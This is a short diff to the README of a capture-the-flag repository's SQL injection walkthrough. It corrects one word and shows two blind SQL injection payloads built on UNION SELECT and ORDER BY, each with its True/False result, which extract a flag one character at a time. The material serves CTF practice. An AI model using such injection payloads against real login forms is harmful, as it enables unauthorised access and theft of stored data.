stevenvegar/CTF-Tools/HackOrGame/SQLinjection/README.md

 Sounds confusing, but, with some practice and successful and failed attempts, you will get it.

-Moving forward with the testing, it's very probably the beginning of the flag is "Flag{" or "FLAG{", so, let's skip that characters and continue guessing the next letter:
+Moving forward with the testing, it's very probably the beginning of the flag is "Flag{" or "FLAG{", so, let's skip those characters and continue guessing the next letter:
 ```
 "admin' UNION SELECT 0,'x','y','FLAG{E' ORDER BY 4,1 --" >>> False
 "admin' UNION SELECT 0,'x','y','FLAG{F' ORDER BY 4,1 --" >>> True